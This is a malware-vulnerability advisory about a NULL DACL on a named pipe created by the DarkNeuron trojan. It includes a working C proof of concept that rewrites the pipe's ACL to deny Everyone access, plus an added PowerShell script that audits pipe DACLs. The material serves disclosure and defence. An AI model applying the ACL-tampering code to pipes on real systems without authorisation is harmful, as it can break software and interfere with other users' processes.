Credits: Malvuln (John Page, aka Hyp3rlinx), Discovery (c) 2022
Original source: https://malvuln.com/advisory/d891c9374ccb2a4cae2274170e8644d8.txt
Contact: [email protected]
Media: twitter.com/malvuln
Backup media: infosec.exchange/@malvuln
Threat: Trojan.Win32.DarkNeuron.gen
Vulnerability: Named Pipe Null DACL
Family: DarkNeuron (Turla Group)
Type: PE32
MD5: d891c9374ccb2a4cae2274170e8644d8
Vuln ID: MVID-2022-0661
Disclosure: 11/24/2022
Description: A malware process called “NCSC.exe” creates a named pipe with a NULL DACL, which grants read/write access to the Everyone group.
\\.\Pipe\Winsock2baseapi_http
RW Everyone
RW BUILTIN\Administrators
Because the DACL is NULL, it can be rewritten by any low-privileged local user, for example to deny Everyone access to the pipe.
Exploit/PoC:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <accctrl.h>
#include <aclapi.h>

/*
Trojan.Win32.DarkNeuron.gen (Turla Group) NCSC.exe
MD5: d891c9374ccb2a4cae2274170e8644d8
NamedPipe Deny Everyone Access
Malvuln
November 2022
*/

#define VULN_TROJAN_PIPE "\\\\.\\pipe\\Winsock2baseapi_http"

int main(void){
    /* Open the trojan's pipe asking for WRITE_DAC; the NULL DACL grants it to anyone. */
    HANDLE hPipe = CreateFileA(VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, 0, NULL);
    PACL pOldDACL = NULL;
    PACL pNewDACL = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;   /* buffer that owns pOldDACL; freed with LocalFree */

    if (hPipe == INVALID_HANDLE_VALUE){
        printf("%lu\n", GetLastError());
        return 1;
    }
    /* Fetch the current DACL (NULL here) so the new entry is merged into it. */
    if (GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, &pSD) != ERROR_SUCCESS){
        printf("%lu\n", GetLastError());
        CloseHandle(hPipe);
        return 1;
    }
    /* Trustee: the well-known Everyone group, looked up by name. */
    TRUSTEE trustee[1];
    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
    trustee[0].ptstrName = (LPTSTR)TEXT("Everyone");
    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
    trustee[0].pMultipleTrustee = NULL;

    /* One access-denied ACE for GENERIC_ALL on the Everyone trustee. */
    EXPLICIT_ACCESS explicit_access_list[1];
    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));
    explicit_access_list[0].grfAccessMode = DENY_ACCESS;
    explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
    explicit_access_list[0].grfInheritance = NO_INHERITANCE;
    explicit_access_list[0].Trustee = trustee[0];

    if (SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){
        printf("%lu\n", GetLastError());
        LocalFree(pSD);
        CloseHandle(hPipe);
        return 1;
    }
    /* Write the new DACL back onto the pipe object. */
    if (SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){
        printf("%lu\n", GetLastError());
        LocalFree(pNewDACL);
        LocalFree(pSD);
        CloseHandle(hPipe);
        return 1;
    }else{
        printf("Trojan.Win32.DarkNeuron.gen (Turla Group) PWNED!\n");
        printf("By Malvuln\n");
        printf("Nov 2022\n");
    }
    LocalFree(pNewDACL);
    LocalFree(pSD);
    CloseHandle(hPipe);
    system("pause");
    return 0;
}
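As an added defensive check that is not part of Malvuln's advisory or PoC, the following PowerShell script opens a named pipe with READ_CONTROL only and reports whether its DACL is NULL or contains an ACE granting Everyone write-class rights (GENERIC_ALL, GENERIC_WRITE, WRITE_DAC or FILE_WRITE_DATA). The default pipe name is the one from the advisory; the wrapper class `PipeAudit` and the function `Get-PipeDaclFindings` are my own names, and the script assumes a listening pipe instance exists, since opening a pipe connects to it.

```powershell
# Audit one named pipe for a NULL DACL or an Everyone write ACE (added example, not Malvuln's code).
# The pipe is opened with READ_CONTROL only, so no data is read from or written to it.
param([string]$PipeName = 'Winsock2baseapi_http')   # pipe name from the advisory
Add-Type -TypeDefinition @'
using System; using System.Runtime.InteropServices; using Microsoft.Win32.SafeHandles;
public static class PipeAudit {   // hypothetical helper name
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern SafeFileHandle CreateFile(string name, uint access, uint share,
        IntPtr sa, uint disposition, uint flags, IntPtr template);
    [DllImport("advapi32.dll")]
    public static extern uint GetSecurityInfo(SafeFileHandle h, int objType, uint secInfo,
        IntPtr owner, IntPtr group, out IntPtr dacl, IntPtr sacl, out IntPtr sd);
    [DllImport("advapi32.dll")] public static extern uint GetSecurityDescriptorLength(IntPtr sd);
    [DllImport("kernel32.dll")] public static extern IntPtr LocalFree(IntPtr mem);
}
'@
function Get-PipeDaclFindings {
    param([string]$Name)
    $READ_CONTROL = 0x20000; $OPEN_EXISTING = 3; $SE_KERNEL_OBJECT = 6; $DACL_SECURITY_INFORMATION = 4
    $WRITE_MASK = 0x50040002   # GENERIC_ALL | GENERIC_WRITE | WRITE_DAC | FILE_WRITE_DATA
    $dacl = [IntPtr]::Zero; $sd = [IntPtr]::Zero
    $h = [PipeAudit]::CreateFile("\\.\pipe\$Name", $READ_CONTROL, 0, [IntPtr]::Zero, $OPEN_EXISTING, 0, [IntPtr]::Zero)
    if ($h.IsInvalid) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        return "open failed, Win32 error $err (2 = no such pipe, 231 = no listening instance)"
    }
    try {
        $rc = [PipeAudit]::GetSecurityInfo($h, $SE_KERNEL_OBJECT, $DACL_SECURITY_INFORMATION,
            [IntPtr]::Zero, [IntPtr]::Zero, [ref]$dacl, [IntPtr]::Zero, [ref]$sd)
        if ($rc -ne 0) { return "GetSecurityInfo failed: $rc" }
        # A NULL DACL means no ACL at all: every user gets full access, including WRITE_DAC.
        if ($dacl -eq [IntPtr]::Zero) { return 'FINDING: NULL DACL (Everyone has full control)' }
        # Copy the self-relative descriptor into .NET and inspect the allowed ACEs for Everyone (S-1-1-0).
        $bytes = New-Object byte[] ([int][PipeAudit]::GetSecurityDescriptorLength($sd))
        [Runtime.InteropServices.Marshal]::Copy($sd, $bytes, 0, $bytes.Length)
        $raw = New-Object Security.AccessControl.RawSecurityDescriptor($bytes, 0)
        $everyone = New-Object Security.Principal.SecurityIdentifier('S-1-1-0')
        $findings = foreach ($ace in $raw.DiscretionaryAcl) {
            if ($ace.AceType -eq 'AccessAllowed' -and $ace.SecurityIdentifier -eq $everyone -and
                ($ace.AccessMask -band $WRITE_MASK)) { 'FINDING: Everyone allowed 0x{0:X8}' -f $ace.AccessMask }
        }
        if ($findings) { return $findings } else { return 'OK: no Everyone write ACE on the DACL' }
    } finally {
        if ($sd -ne [IntPtr]::Zero) { [void][PipeAudit]::LocalFree($sd) }
        $h.Close()
    }
}
Get-PipeDaclFindings -Name $PipeName
```

Run it as a standard user: a NULL DACL or an Everyone write ACE reported here is exactly what lets an unprivileged account rewrite the pipe's ACL as the PoC above does.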
Disclaimer: This advisory information is provided “as-is,” without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit to the author. Author is not responsible for misuse or misappropriation of information and does not accept responsibility for damages resulting from the misuse. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. Copyright for all content (c) Malvuln.com™